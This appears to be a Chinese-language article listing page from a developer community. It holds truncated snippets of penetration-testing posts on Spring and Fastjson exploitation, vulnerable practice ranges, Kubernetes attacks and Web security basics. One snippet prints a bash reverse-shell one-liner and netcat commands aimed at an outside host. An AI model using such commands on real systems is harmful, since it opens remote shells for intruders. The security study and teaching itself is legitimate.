- 综合排序
- 最热优先
- 最新优先
- 来自专栏网站漏洞修补
渗透测试安全检测漏洞
最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交playload的过程以及是如何拿到最高权限和绕过登录等等执行命令漏洞之类的安全检测方法 在ES5之前没有标准的方法访问这个内置属性,但是大多数浏览器都支持通过 __proto__ 来访问。ES5中有了对于这个内置属性标准的Get方法 Object.getPrototypeOf() 。 查看补丁安装情况 wmic qfe get Caption,Deion,HotFixID,InstalledOn 注册表信息 安装的监控软件 安装的杀毒软件,如果在想要检测自己的网站或app等是否有漏洞以及安全风险问题 ,可以咨询下专业的网站安全公司来处理解决,国内推荐Sinesafe,绿盟,启明星辰等等都是比较不错的。
2.1K00发布于 2019-11-24 - 来自专栏FreeBuf
框架安全之Spring渗透
本篇文章是Spring渗透复现记录,记录了实际中常见的Spring漏洞并如何利用,及简单对漏洞底层的原理分析,分为四个部分:Spring简介、IDEA部署Spring、Vulhub靶场环境搭建和相关漏洞复现 接着,开始我们的Spring渗透之路学习!! Spring Security用于做鉴权,保证安全性。 ? 类比Struts2框架,会发现绝大部分的安全漏洞都和OGNL脱不了干系。 4、漏洞环境搭建 这里使用vulhub靶场进行Spring渗透学习 0x01 Docker环境安装 参考:vulhub漏洞环境搭建 1、安装Docker sudo apt install curlcurl
1.9K30发布于 2021-07-02 - 来自专栏/root
Web安全渗透攻防技术
# 等待连接 # 靶机 nc www.varin.cn 10005 传输文件 攻击机 Last login: Wed Jun 5 09:01:50 2024 from 110.90.8.132 -i <&3 >&3 2>&3");' bash 反弹 # 修改IP 端口 bash -i >& /dev/tcp/www.varin.cn/10005 0>&1 nmap 简介:开源免费的网络发现和安全审计工具 # 3)Infectious Media Generator:感染式媒介生成器 # 4) Create a Payload and Listener:创建Payload和Listener # 5)
26510编辑于 2025-09-28 - 来自专栏网站漏洞修复
渗透测试安全检测漏洞
最近渗透测试工作比较多没有空闲的时间来写文章,今天由我们Sine安全的渗透主管来普及一下java的安全测试基础,很多客户想要了解具体js的调用漏洞或提交playload的过程以及是如何拿到最高权限和绕过登录等等执行命令漏洞之类的安全检测方法 在ES5之前没有标准的方法访问这个内置属性,但是大多数浏览器都支持通过 __proto__ 来访问。ES5中有了对于这个内置属性标准的Get方法 Object.getPrototypeOf() 。 查看补丁安装情况 wmic qfe get Caption,Deion,HotFixID,InstalledOn 注册表信息 安装的监控软件 安装的杀毒软件,如果在想要检测自己的网站或app等是否有漏洞以及安全风险问题 ,可以咨询下专业的网站安全公司来处理解决,国内推荐Sinesafe,绿盟,启明星辰等等都是比较不错的。
2K10发布于 2019-11-27 - 来自专栏信安之路
网络安全渗透测试
可自行定义插件(Plug-in) NASL(Nessus Attack Scripting Language) 是由 Tenable 所开发出的语言,用来写入Nessus的安全测试选项。 绘制网络拓扑 绘制网络拓扑对于我们理解企业内部网络非常关键,它让我们在下一步渗透测试时思路更加清晰,让我们的渗透测试更加顺利有效。 常用代理软件: Proxifier, SSL Proxy, Proxy Finder等 记录结果 在渗透测试中的任何环节都是需要记录下来的,不仅仅是为了方便我们的整个渗透测试的过程,而且在客户验收的时候也很关键 重要工具 渗透框架 Kali Linux Backtrack5 R3 Security Onion 侦查工具 Smartwhois MxToolbox CentralOps dnsstuff nslookup Enum4Linux nslookup Netscan 漏洞扫描 Nessus GFI Languard Retina SAINT Nexpose 密码破解 Ncrack Cain & Abel LC5
1.6K01发布于 2018-08-08 - 来自专栏FreeBuf
框架安全之Fastjson渗透
接着,开始我们的Fastjson框架渗透学习!! 5)在Module中导入模块,在Dependencies中点击加号,选择第一项 ? 6)选则刚刚导入的jar包,确认即可 ? ? 5)成功上线CS ? 0x04 原理分析 参考:Fastjson <=1.2.47 远程代码执行漏洞分析 - 安全客,安全资讯平台 (anquanke.com) 4、Fastjson1.2.62 漏洞简述 利用方法: 基于黑名单绕过 本篇文章涉及到两个工具:marshalsec-0.0.3-SNAPSHOT-all.jar和fastjson_tool.jar在渗透利用的过程中,本质上都是开启RMI/lDAP服务器发送恶意代码至靶机上
3.9K40发布于 2021-07-27 - 来自专栏白安全组
渗透安全测试的靶场
,里面继承了57个数据库的渗透测试环境。 包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 其中包含了丰富的渗透测试项目,如SQL注入、跨站脚本、clickjacking、本地文件包含、远程代码执行等. 此应用程序还包含在BT5里 链接地址:http://exploit.co.il/projects/vuln-web-app WackoPicko WackoPicko是由Adam Doupé Google推出的XSS小游戏 链接地址:https://xss-game.appspot.com/ Web for Pentester for pentester是国外安全研究者开发的的一款渗透测试平台
6.8K20发布于 2019-08-09 📘 网络安全、Web安全与渗透测试
网络安全、Web安全与渗透测试1️⃣ 核心攻击与安全概念WebShell:以asp、php、jsp等形式存在的网页后门,提供命令执行环境,常用于控制服务器。 4️⃣ 渗透测试与防御方法手工查找后门木马技巧检查启动项(msconfig)、服务项。查看system32等关键目录最新修改文件。运行netstat -an排查可疑网络连接。 5️⃣ 协议与技术要点HTTPS:SSL/TLS加密,确保传输安全与身份认证。SSH:提供安全远程登录,支持基于密钥认证。NAT:内网地址转换,实现公网共享与内网隔离。 ✅ 网络安全·渗透测试题库(配套练习) 一、单项选择题(每题 2 分)关于 WebShell 的描述正确的是:A. 是一种病毒文件B. 是物理入侵的入口C. 是一种网页木马后门,支持远程命令执行D. 5.(✘)HTTPS 协议仅使用对称加密技术。undefined✏️ 三、简答题(每题 5 分)简述木马的原理及检测方法。
32210编辑于 2025-08-07- 来自专栏世荣的博客
渗透测试笔记-5
执行一个外部的应用程序的输入并显示输出的结果 2.exec():执行一个外部的应用程序,但不显示输出的结果 3.passthru():执行一个系统命令并显示原始的输出 4.shell_exec():执行shell命令并返回输出的结果的字符串 5. 7.0之后的demo: 3.call_user_func():回调函数,可以使用is_callable查看是否可以进行调用 4.call_user_fuc_array():回调函数,参数为数组 5.create_function ():创建匿名函数 5.preg_replace():当php版本小于7时,当为 /e 时代码会执行 6.array_map():为数组的每个元素应用回调函数 7.array_filter():依次将 保证第二个参数中对于正则匹配出的对象,用单引号包裹 12.CORS跨域资源共享漏洞 CORS跨域资源共享漏洞 1.CORS跨域资源共享 1.1 简答跨域请求 1.2 非简单请求 2.CORS安全问题
46520编辑于 2022-03-18 - 来自专栏靶机渗透
靶机渗透DC-5
注意,Shell需要进入/tmp/目录下,同时kali也是在/tmp/目录下开启服务,否则传输会找不到文件。
59701发布于 2020-04-18 - 来自专栏全栈程序员必看
【安全】Web渗透测试(全流程)
; 文件类型判断,应对上传文件的后缀、文件头、图片类的预览图等做检测来判断文件类型,同时注意重命名(Md5加密)上传文件的文件名避免攻击者利用WEB服务的缺陷构造畸形文件名实现攻击目的; 禁止上传目录有执行权限 渗透测试 示例:DVWA渗透系列二:Command Injection 风险评级:高风险 安全建议 拒绝使用拼接语句的方式进行参数传递; 尽量使用白名单的方式(首选方式); 过滤危险方法、特殊字符,如: 渗透系列十二:XSS(Stored) 反射型:DVWA渗透系列十一:XSS(Reflect) DOM型:DVWA渗透系列十:XSS(DOM) 风险评级:高风险 安全建议 不信任用户提交的任何内容,对用户输入的内容 ; 使用非常规路径(如对md5加密)。 ,可能为了开发方便而简化了身份认证 示例:DVWA渗透系列九:Weak Session IDs 风险评级:高风险 安全建议 使用强身份识别,不使用简单弱加密方式进行身份识别; 服务器端使用安全的会话管理器
2K30编辑于 2022-09-07 - 来自专栏/root
网络安全渗透工具汇总
一、HackBar github地址:https://github.com/Mr-xn/hackbar2.1.3.git 介绍 HackBar是一款基于浏览器的渗透测试工具,可以简化目标网站的攻击流程 编码/解码工具:HackBar 提供了各种编码和解码工具,包括 URL 编码、Base64 编码、MD5 加密等。这些工具可用于在渗透测试中对数据进行编码或解码,以绕过一些安全机制或进行数据处理。 这对于进行身份验证、绕过登录限制等方面的渗透测试非常有用。 参数注入:HackBar 提供了一个参数注入工具,可以帮助用户在 URL 中注入自定义的参数。 用户可以使用这个工具测试网站的安全性,尝试发现潜在的漏洞。 _0文件夹 成功加入界面 二、中国蚁剑 github地址:https://github.com/AntSwordProject 介绍 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员
49910编辑于 2025-09-28 - 来自专栏网站漏洞修补
渗透测试之网站SESSION安全
这一部分内容的重中之重是session和cookie,客户在安全使用app系统时,如何根据客户的身份提供不同的功能和相关数据,每个人都有这样的体验。 当我们安全使用xss漏洞时,我们都喜欢获得客户的cookie。获得cookie后,最重要的字段是sessionID。有了他,我们可以伪造他人的身份并获得他人的数据。 作业2:基于以前的作业,开发的登录认证页面,认证成功后,对不同的账户设定不同的权限,分别用cookie和session来显示客户的身份,测试不同的显示方式可能存在的安全风险。 目前对于网站和APP安全漏洞上对于获取SESSION和COOKIES的问题比较多,很多程序员对一些提交功能没有做更多的过滤,导致被插入了恶意XSS代码从而获取到了后台权限,如果大家想要更全面的检测安全漏洞问题的话可以像国内的网站安全公司寻求人工渗透测试服务的帮助
3.5K30发布于 2020-12-29 Web安全之综合渗透测试
Web安全之综合渗透测试 任务环境说明: 服务器场景名称:环境私信博主 服务器场景用户名:未知;密码:未知 通过url访问http://靶机/1,对该页面进行渗透测试,将完成后返回的结果内容作为flag 提交 Flag:flag{htmlcode} 2.通过url访问http://靶机/2,对该页面进行渗透测试,将完成后返回的结果内容作为flag提交 Flag: flag{vimbakswp} 3.通过 url访问http://靶机/3,对该页面进行渗透测试,将完成后返回的结果内容作为flag提交 Flag:flag{spider} 4.通过url访问http://靶机/4,对该页面进行渗透测试,将完成后返回的结果内容作为 flag提交 flag:flag{sqlinject1} 5.通过url访问http://靶机/5,对该页面进行渗透测试,将完成后返回的结果内容作为flag提交 Flag:flag{wannengpwd } 6.通过url访问http://靶机/6,对该页面进行渗透测试,将完成后返回的结果内容作为flag提交 Burpsuite设置一下代理
15610编辑于 2025-10-23- 来自专栏王先森
Kubernetes云原生安全渗透学习
在实际项目也经常发现厂商部署了使用k8s进行管理的云原生架构环境,在目前全面上云的趋势,有必要学习在k8s环境的下的一些攻击手法,本文非常适合刚入门或者准备学习云安全方向的安全人员,每个步骤都是亲手复现整理 请求的最后一个步骤,一般用于拓展功能,如检查 pod 的resource是否配置,yaml配置的安全是否合规等。 主要存在4种类型的通信: 同一Pod内的容器间通信 各Pod彼此间通信 Pod与Service间的通信 集群外部的流量与Service间的通信 当我们起点是一个在k8s集群内部权限受限的容器时,和常规内网渗透区别不大 采用CDK攻击 CDK(Container DucK)是一款为容器环境定制的渗透测试工具,在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。 目前在k8s默认的安全配置下,Kubelet API是需要安全认证的。
2.2K30编辑于 2023-04-24 - 来自专栏网站漏洞修补
网站安全评估渗透测试方法
近年来,出现了各种网站攻击方法,也出现了许多相应的网络渗透测试和评估方法。为了提高网站的整体安全性,整合网络渗透测试和评估具有重要的实际应用价值。 本文首先研究了渗透测试的主要技术,总结了渗透测试的方法和特点。 以及存在的缺陷。其次,在利用各种渗透测试技术对网站进行测试获得测试结果的基础上,设计了基于自动集成测试系统的渗透测试和安全评估方案。 研究表明,在不损坏测试系统的基础上,本文提出的渗透测试方法可以有效检测系统的安全问题和漏洞,自动化测试方法有效可行。现场网站安全评估结果与实测结果相吻合,说明本文提出的安全评价方法是正确有效的。 综上所述,需要设计一个系统来整合渗透测试和安全评估工具的优势。 综合测试测试目标不仅可以大大提高网站的整体安全性,而且集成系统操作简单,可重用性高,适用范围广,如果想要对网站或APP进行全面的渗透测试服务安全评估的话,可以向网站安全公司或渗透测试公司寻求服务。
3.5K20发布于 2021-07-14 - 来自专栏网站漏洞修补
安全渗透测试网站漏洞问题
前不久接到朋友的寻求帮助(前提必须要有授权许可,可不能乱渗透测试),就是说有个站搞不了了,让我看看能否协助整一下;恰好近期应急处置结束了在看系统日志,看的有点苦恼,因此便接下了这一工作,提升点快乐。 综合检测后发掘存在的漏洞还不少,一些包含文件漏洞可以执行,直接上传脚本拿下了权限,至此结束,建议大家有需求对自己网站或APP进行全面的安全检测的话可以去网站安全公司那里去看看,国内做的比较专业的如SINESAFE ,鹰盾安全,启明星辰等等。
3.6K30发布于 2020-07-06 - 来自专栏AI SPPECH
AI辅助安全渗透测试_02
近年来,人工智能(AI)技术的快速发展为安全渗透测试带来了新的思路和方法。AI辅助安全渗透测试能够自动化识别潜在的安全漏洞,分析攻击路径,甚至预测可能的攻击手段,大大提高了安全测试的效率和准确性。 概念解析 AI辅助安全渗透测试的定义与特点 AI辅助安全渗透测试(AI-Assisted Security Penetration Testing)是指利用人工智能技术辅助或增强传统的安全渗透测试过程, 核心原理 AI辅助安全渗透测试的技术基础 AI辅助安全渗透测试技术主要基于以下核心技术: 机器学习(Machine Learning):机器学习是AI辅助安全渗透测试的核心技术之一,主要包括监督学习、 generate_pentest_report(vulnerabilities, attack_paths) # 5. 模拟日志异常分析 print("\n5. 企业需要定期进行安全渗透测试,确保系统的安全性和合规性。 数据隐私与安全伦理挑战:AI辅助安全渗透测试需要收集和分析大量的系统数据和安全信息,这可能涉及数据隐私和安全伦理问题。
65210编辑于 2025-11-13 - 来自专栏AI SPPECH
AI辅助安全渗透测试_03
安全渗透测试作为发现系统漏洞的关键手段,其效率和深度直接影响企业安全态势。然而,传统人工渗透测试存在成本高、周期长、覆盖率有限等问题,难以应对现代复杂IT架构的安全评估需求。 本研究基于对15个行业领先AI安全测试工具的深入分析和5个企业级实施案例,系统探讨AI在安全渗透测试中的应用现状、核心技术、实践效果及未来趋势,为网络安全从业者提供全面的技术路线图。 概念解析 AI辅助安全渗透测试定义与分类 AI辅助安全渗透测试是指利用人工智能技术增强或部分替代传统人工渗透测试流程,提高漏洞发现效率和准确性的新兴测试方法。 基于强化学习的自适应渗透测试 状态表示:系统漏洞状态+网络拓扑+攻击历史 动作空间:可能的攻击步骤集合 奖励函数:发现高危漏洞(+10),新攻击路径(+5),重复尝试(-2) 算法优化:Proximal :在不中断生产的情况下完成全面安全评估 漏洞发现:识别出42个ICS漏洞,其中8个高危漏洞 攻击模拟:成功模拟5种针对电网的攻击场景,验证了防御措施有效性 响应能力:安全事件检测时间从平均4小时缩短至12
76710编辑于 2025-11-13 - 来自专栏算法与编程之美
安全|Dvwa渗透测试网站搭建
Dvwa简介 DVWA(Damn Vulnerable Web Application)是一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境 ,帮助web开发者更好的理解web应用安全防范的过程。 破解)) Command Injection(命令行注入) CSRF(跨站请求伪造) File Inclusion(文件包含) File Upload(文件上传) Insecure CAPTCHA (不安全的验证码 Injection(SQL注入) SQL Injection(Blind)(SQL盲注) XSS(Reflected)(反射型跨站脚本) XSS(Stored)(存储型跨站脚本) DVWA 1.9的代码分为四种安全级别 结语 由此网站搭建完成,渗透测试人员或学习渗透测试的朋友们,可以在自己的网站开始高破坏了。希望大家留言转发关注“算法与编程之美”公众号。
4.1K00发布于 2019-10-10
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号